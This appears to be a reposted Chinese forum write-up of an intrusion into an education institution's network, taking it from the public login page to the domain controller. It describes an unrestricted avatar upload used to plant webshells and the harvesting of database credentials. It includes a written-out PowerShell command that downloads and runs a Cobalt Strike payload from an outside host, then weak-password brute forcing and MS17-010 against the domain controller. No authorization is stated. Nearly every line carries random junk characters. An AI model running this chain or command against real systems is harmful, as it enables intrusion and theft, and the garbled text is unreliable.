|
% J* g9 K- X( F1 Y0 _. w" ?4 H1 h8 m
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路8 R- [+ A0 i7 `! X9 r% f( {; L7 ]+ ]
, i5 W- w. m( i+ H. J) r7 N8 R' R g5 U8 |
. m1 m6 ~) p* ?, m* D
( n$ S2 R8 T, _6 {
. E7 `& F8 H% b 正文
! u' x9 c- ^# V: H8 O- M9 F # r3 a4 m S9 J" D- E. j
; S( o5 _' C0 A( L W0 M# ~1 Z# g+ S
4 L! @ Y# W- l1 `" _. k$ Q* w
! c9 [5 V8 `7 \7 _
目标:www.xxxx.com(一家教育机构)
$ S0 R' ~9 A: N$ N0 `) `$ M( x打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
7 k6 |% @7 O+ F/ d5 `; _
' i+ I& p _, i% W7 v5 p) [1 q) r0 H u( Z" S, l8 V
' I R6 n, F& O* m4 V) A/ S
# g3 H3 \* ?5 \6 l' x6 i1 L4 J( c
进行了简单的信息搜集
" e' h" w. A2 |
M2 W4 ^8 d3 g& q. e
' i7 N) |! I. b. i
4 w3 {; d; i4 \( C% o: R; n% \* o- C
7 c5 _: F; u% F 子域名搜集) ] \' M' [2 K: V$ _7 s
1 t& ]# W5 S/ B4 B# o3 ^5 ~3 e' C7 h1 Y7 x( M' q1 F' f
 + @ k, E+ t( Z
4 s& B/ a* R; h
8 [0 H( B; k; A6 P fofa找资产
) d6 i2 }3 t3 c3 E' C/ \+ m
. L1 ~- U- w9 X& Q- f
0 o" p z0 f+ M% N, a2 W, Y
) I+ f) ?) {/ Q! E, Z# s( O
1 H. A& [8 }+ o: l, b
4 n/ z; j) g7 v {- L " f0 U/ e$ T( ?7 E' v) c
5 [3 |; d* [2 q6 j. @( f 一共七个资产。去重之后只有两个。
1 y! c1 K/ z: R
7 p9 d: n! A/ I! P- j
/ X( J8 w$ b" D( f5 k3 g6 W
! L& t: |. r8 R) c. t% V7 W
. L9 [0 g$ r, j1 }1 T 目录探测
# P* p) g' y3 }+ m/ d7 D. b # a/ A( E" E1 K
1 {- O5 _& g# f0 g
- b% X1 K( t# x. b4 w2 ]4 h
+ G6 M$ h$ i1 @5 \; s' p$ M0 V3 t3 W; c$ h1 ^$ y, o+ j
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
5 j( n; Y" l" |7 D( c
7 y9 N |4 O: h+ h) x! |
' l. g5 \: P9 _2 I0 E1 G5 ?
. t- J z7 ^% Q0 e& q; p8 |7 [' X" k
我又尝试了通过修改返回包来绕过登录界面/ @7 j% ?, y# m" [: l
8 c( A* b1 r% D( u
& w& e# e- x5 d& M' G* [* o& e 
V( B9 v# b+ V$ E' m/ R k6 A7 s! c. [: e& B
% |6 v$ H: [$ s, N; L! v 还是不行,尝试注入无果1 u9 n0 F9 ?* b' }) K7 a/ c p
0 d" Y1 Z# X7 S9 a' h T
& z5 M1 Y6 _, w; A  ; t' Q, m7 g+ \# t3 W R
& C7 U5 `/ p J
: o3 ]4 O5 y( ]& ~
不过我目录探测出了一处Spring信息泄露
`' A4 X3 p" _8 v
; ?0 p$ A4 ]8 n$ M4 C3 a: F/ z. P( p* P6 U9 B
% Y7 Y8 j. h I( D3 o
. g" E$ W" ~$ g& V
 * u+ b1 }; f, Q6 H8 |
: S y/ ]% H- r0 p; Z3 Y9 x
1 H/ G: w$ D1 e2 z: e 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 G: S9 e( P6 J% s# ^3 [
7 s& E7 A1 C7 u, A! N( y
; h! M/ {' h) K7 C* ^$ _  2 S9 D. \( ] H/ O+ E; y# h
- a5 ^5 ~ F$ _8 G" y# L8 y3 L# A5 l7 V- I
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
, Q6 A2 @8 V1 F; H4 E3 x( D 3 t P1 b+ n ]7 Y9 l+ ^' q7 H
- b, }; z T/ h) s# Y- D 
4 o8 N$ m0 K0 D& q. }; S- k: P4 \ 9 i V& c: T' m$ m
" C( B) I& s; \9 q 获取有些师傅到这一步就手机抓包电脑测了。5 O L1 Y) ?) d9 {
& b) t4 i! f3 c/ p" ?2 x) y" Z/ u) f4 `7 B! a) z9 \; W7 ]
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 v, Z4 y) b' l7 ^; i
+ y6 ]1 g1 Y8 Z9 P7 ?/ s# M
4 q- L9 p" Z# T8 q. e. S/ ]8 ]) k 其中在一个公众号发现了小程序,可以进行注册。
( p8 u; {8 {4 `+ P4 r, K 2 j0 [0 V& v1 A
. w& b2 k7 k/ J8 f: A 看到了头像上传,尝试上传获取WebShell
& A" q5 d2 m9 E8 v- j - a5 {1 D) h8 ]3 I3 v
& ^' @ o; r# c
. f/ y' j* }4 \ {$ i
- ]/ p! ?4 @9 {3 n% _: Y; r& W; v n. [
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 W8 c4 n7 I4 o p
`6 w0 a4 f3 f- q( }5 _8 Y6 ^
- _5 T X6 l7 F. O3 I 
% O! K1 U8 E% ` f
, X6 x/ g0 s9 }. b7 z
# _8 X5 L5 k# l; P 然后上了大马
) e" m1 A; w: ~ ) w' a! d: O1 l) ~/ [7 f/ T2 ^
: R8 U$ Q. V* I% @
7 G# p1 f4 ^% \& M$ w
. V: r3 H; O% A1 K! x8 K! p L" B& K% T& P/ g( O& m( K
 ( M4 W4 F; A- V
T, J; Y: G3 R3 A8 S- `, N
! J' V1 e2 N2 ^% z9 e$ b9 y 通过翻找文件发现数据库账号密码
- ]' R+ L2 S: j 7 K, j: L1 X1 T3 i. a# J
* D9 y8 U3 T( m
 ) e2 A# v7 q2 Z7 i- o: \
; Q# ~) M. w' v5 a1 U _9 d! K {# E3 P8 W6 k
--内网渗透
. Q' F5 ^ A: O9 c
( x5 h4 h1 J- ~2 ?# o' [4 [8 d0 _4 g$ x. I/ d8 }' C
直接通过powershell执行 cs上线
( Y+ _! i I" h t: ]% I" |( V# a
Q; Y" y4 V2 z2 m. |1 M* u6 l4 v6 A+ t) \# q$ Z
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"% H! ]: \1 q9 K4 @: t' U7 }; e
) M! H$ c5 R* Y d4 F
4 T$ u( j! W2 U' |* F' c 
2 p4 \! n$ c0 b; K5 f- m+ x& w + T! H- @$ h( [ G; c
) k& \3 R( p5 s% {
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
6 S9 N4 q) |5 Z7 E3 K1 ] 9 A. i- \+ F$ ?) m4 N( ~7 n6 i( ~8 t
! ^- }1 L+ G! J8 a" S# j+ h+ E
 & c- R9 w0 w& A4 ?- F/ g
) ?$ ]* W7 T V' M5 ~
6 O3 |8 n+ C+ k8 w& q/ | 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
: J# I, A2 b" q3 c
+ T1 V; E9 M; n t7 F- t
1 }9 l6 k' |0 k6 Q
8 Z F6 b: M/ k4 C. T- Z
1 c7 `! ]1 `$ a- H, U ~# S3 ?: ~8 M! C" ~' U
 9 t/ y2 T; C9 v
& y2 s9 F& }# k: d0 X
. W- u9 y' m9 C6 P1 X( v/ x4 Q+ m 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
`# l" M6 l# b
4 }. w9 H5 l- K- `+ P8 g+ J2 p) i \. s
0 [$ C7 O# o9 f/ |
' a2 c* ]3 A& e$ J5 d  4 p# b% j9 ^$ r( ]' ]: O1 g
: U/ P. e, X: f3 f& T7 t( L8 I4 _% @9 Z2 R
* G: w2 _3 V W' Z
% N; N* `! B" |6 I$ q+ @4 L# ~5 D0 @6 l2 L
4 T$ { \$ ]9 X& I5 p
3 O3 M# Y* ]1 r0 M4 J+ y
+ F! L! }( `( L1 B8 U
. C5 J# _" R* d6 h0 |2 y7 m. d" }, ]3 | G( t3 E. w
小结
2 d/ h' d# P: H, Q1 {0 s) y
; t$ ], _" ]+ K+ n4 S& Z8 p9 T" z& D$ r8 h! B0 M" X' ~
! ~3 R: W! D/ e7 I D 2 v" Y& ]0 T% P+ Y/ _/ n. z
. O c: y1 Y% `9 e P4 C0 m3 A1 H$ [ 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
# d! J5 P6 N, k$ R/ O, f. l
! @/ u3 q/ k9 X' a3 H3 k: s+ g( ]+ u8 ^7 I
, V( L1 r" I# l0 T2 K+ p
" k( Q$ s3 w4 z9 h/ F0 O, @) g! p) q5 T3 o; K
- 7 Q) P- f6 _$ e+ U
; Z! ^3 u" {0 X/ E3 o
! |( ^8 T* W8 B8 j8 d& n -
0 l J$ q, F( I7 _- [9 B
0 P1 ~2 O) [! a1 ^$ t9 t
5 ]# s2 d# x& Y6 z% V* t
+ F4 i9 K; q, c; T2 ~- g; e! d
2 r( l- Q9 ^, x5 d5 @1 [ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html2 ]3 N. ?) s% R. y3 k4 E& ?: S7 t) [9 G
8 s( A1 x7 R) X2 H. |: A8 P* A+ r5 n9 u/ ~. F7 e3 u. t
3 F5 q$ X4 G9 \ O" u | 
发表于 2024-3-1 19:41:32
收藏
支持
反对